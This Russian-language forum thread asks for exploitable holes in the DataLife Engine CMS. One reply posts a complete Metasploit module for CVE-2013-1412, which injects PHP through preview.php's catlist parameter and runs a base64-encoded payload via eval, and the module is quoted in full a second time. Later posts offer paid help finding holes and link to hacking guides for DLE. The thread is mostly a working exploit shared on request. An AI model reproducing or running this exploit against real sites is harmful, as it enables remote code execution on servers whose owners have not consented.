Помогите найти дырки в DLE

Iurii_Kharkov · 2 июн 2013

Если вы знаете какие либо дырки в CMS DLE напишите их сюда.

Iurii_Kharkov · 3 июн 2013

up

Chilly · 3 июн 2013

Харьков любит мультиакки.

Iurii_Kharkov · 3 июн 2013

Chilly сказал(а): ↑

Харьков любит мультиакки.
Нажмите, чтобы раскрыть...

дык банят и банят!

Chilly сказал(а): ↑

Харьков любит мультиакки.
Нажмите, чтобы раскрыть...

в dle дырки то есть?

HaberMan · 4 июн 2013

Дырка в ЖОПЕ а правильно лазейки!

Deviash · 5 июн 2013

preview.php PHP Code Injection

Код:

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'DataLife Engine preview.php PHP Code Injection',
      'Description'    => %q{
          This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
        The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
        with the e modifier, which allows to inject arbitrary php code, when the template
        in use contains a [catlist] or [not-catlist] tag.
      },
      'Author'        =>
        [
          'EgiX', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'    =>
        [
          [ 'CVE', '2013-1412' ],
          [ 'BID', '57603' ],
          [ 'EDB', '24438' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
          [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
        ],
      'Privileged'    => false,
      'Platform'      => ['php'],
      'Arch'          => ARCH_PHP,
      'Payload'        =>
        {
          'Keys'  => ['php']
        },
      'DisclosureDate' => 'Jan 28 2013',
      'Targets'        => [ ['DataLife Engine 9.7', { }], ],
      'DefaultTarget'  => 0
      ))
 
    register_options(
      [
        OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
      ], self.class)
  end
 
  def base
    base = normalize_uri(target_uri.path)
    base << '/' if base[-1, 1] != '/'
    return base
  end
 
  def check
    fingerprint = rand_text_alpha(4+rand(4))
    res = send_request_cgi(
      {
        'uri'      =>  "#{base}engine/preview.php",
        'method'    => 'POST',
        'vars_post' =>
          {
            'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//"
          }
      })
 
    if res and res.code == 200 and res.body =~ /#{fingerprint}/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end
 
  def exploit
    @peer = "#{rhost}:#{rport}"
 
    print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
    res = send_request_cgi(
      {
        'uri'      =>  "#{base}engine/preview.php",
        'method'    => 'POST',
        'vars_post' =>
          {
            'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decod  e(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//"
          }
      })
  end
end

HaberMan · 5 июн 2013

Mik1313 сказал(а): ↑

Эксплоит сканером проверь, может чего найдет.
А вообще иди на баг-трек или эксплоит-бд.
Что то вроде milw0rm'a или exploit-db.

Дырка у тебя в мозгах. Не придирайся к словам.
Можно еще 3+ синонима найти.
Нажмите, чтобы раскрыть...

Я же шучу :3

Iurii_Kharkov · 5 июн 2013

Deviash сказал(а): ↑

preview.php PHP Code Injection

Код:

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'DataLife Engine preview.php PHP Code Injection',
      'Description'    => %q{
          This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
        The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
        with the e modifier, which allows to inject arbitrary php code, when the template
        in use contains a [catlist] or [not-catlist] tag.
      },
      'Author'        =>
        [
          'EgiX', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'    =>
        [
          [ 'CVE', '2013-1412' ],
          [ 'BID', '57603' ],
          [ 'EDB', '24438' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
          [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
        ],
      'Privileged'    => false,
      'Platform'      => ['php'],
      'Arch'          => ARCH_PHP,
      'Payload'        =>
        {
          'Keys'  => ['php']
        },
      'DisclosureDate' => 'Jan 28 2013',
      'Targets'        => [ ['DataLife Engine 9.7', { }], ],
      'DefaultTarget'  => 0
      ))
 
    register_options(
      [
        OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
      ], self.class)
  end
 
  def base
    base = normalize_uri(target_uri.path)
    base << '/' if base[-1, 1] != '/'
    return base
  end
 
  def check
    fingerprint = rand_text_alpha(4+rand(4))
    res = send_request_cgi(
      {
        'uri'      =>  "#{base}engine/preview.php",
        'method'    => 'POST',
        'vars_post' =>
          {
            'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//"
          }
      })
 
    if res and res.code == 200 and res.body =~ /#{fingerprint}/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end
 
  def exploit
    @peer = "#{rhost}:#{rport}"
 
    print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
    res = send_request_cgi(
      {
        'uri'      =>  "#{base}engine/preview.php",
        'method'    => 'POST',
        'vars_post' =>
          {
            'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decod  e(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//"
          }
      })
  end
end

Нажмите, чтобы раскрыть...

И что через это можно сделать?

Iurii_Kharkov · 5 июн 2013

Mik1313 сказал(а): ↑

Оки:3

Скачай Ruby\Metasploit и запусти эксплойт. И так же гугли про работу с эксплойтами.
http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html - там имеется патч.
Но если ты не знаешь пхп, перла, руби, скъюл и т.д, то лучше просто закрой тему.

А так же, читай описание:

PHP:

This module exploits a PHP code injection vulnerability DataLife Engine 9.7. The vulnerability exists in preview.php, due to an insecure usage of preg_replace() with the e modifier, which allows to inject arbitrary php code, when the template in use contains a [catlist] or [not-catlist] tag.

Нажмите, чтобы раскрыть...

У меня dle 9.8

Imnotf · 5 июн 2013

DLE сам по себе, одна, огромная дырка.

Iurii_Kharkov · 5 июн 2013

Кто знает все дырки пишите в ЛС. платная помощь так сказать

Deviash · 5 июн 2013

DLE сам по себе, одна, огромная дырка.
Нажмите, чтобы раскрыть...

Найди. И примени. Честно - дам пирожок и денег. Если найдёшь - именно ты.

Imnotf · 6 июн 2013

Deviash сказал(а): ↑

Найди. И примени. Честно - дам пирожок и денег. Если найдёшь - именно ты.
Нажмите, чтобы раскрыть...

Мотивация слабовата... А пирожок с капустой?

Iurii_Kharkov · 6 июн 2013

Mik1313 сказал(а): ↑

Позволь узнать, зачем?

Нажмите, чтобы раскрыть...

чтобы их пофиксить

AntonK1986 · 23 апр 2017

Вот тут есть парочку паблик уязвимостей критических:
https://und3rgr0und.pro/forums/ujazvimosti-cms-forumov.39/

А тут подробный способ взлома описан:
https://und3rgr0und.pro/threads/vzlamyvaem-dle-9-x-10-x-11-x.104/

AtomicScience · 23 апр 2017

ЕЕЕЕЕ некропост

Типа админ:D · 23 апр 2017

AntonK1986 сказал(а): ↑

Вот тут есть парочку паблик уязвимостей критических:
https://und3rgr0und.pro/forums/ujazvimosti-cms-forumov.39/

А тут подробный способ взлома описан:
https://und3rgr0und.pro/threads/vzlamyvaem-dle-9-x-10-x-11-x.104/
Нажмите, чтобы раскрыть...

ща тебе тут сраку взломают

Rikas · 27 апр 2017

AntonK1986 сказал(а): ↑

Вот тут есть парочку паблик уязвимостей критических:
https://und3rgr0und.pro/forums/ujazvimosti-cms-forumov.39/

А тут подробный способ взлома описан:
https://und3rgr0und.pro/threads/vzlamyvaem-dle-9-x-10-x-11-x.104/
Нажмите, чтобы раскрыть...

паже прастите но сэр смарите на дату темы

Войти или зарегистрироваться

Помогите найти дырки в DLE

Iurii_Kharkov Старожил Пользователь

Iurii_Kharkov Старожил Пользователь

Chilly Старожил Пользователь

Iurii_Kharkov Старожил Пользователь

HaberMan Активный участник

Deviash Активный участник Пользователь

HaberMan Активный участник

Iurii_Kharkov Старожил Пользователь

Iurii_Kharkov Старожил Пользователь

Imnotf Активный участник

Iurii_Kharkov Старожил Пользователь

Deviash Активный участник Пользователь

Imnotf Активный участник

Iurii_Kharkov Старожил Пользователь

AntonK1986 Ньюби

AtomicScience Активный участник Пользователь

Типа админ:D Активный участник Пользователь

Rikas Активный участник Пользователь

Поделиться этой страницей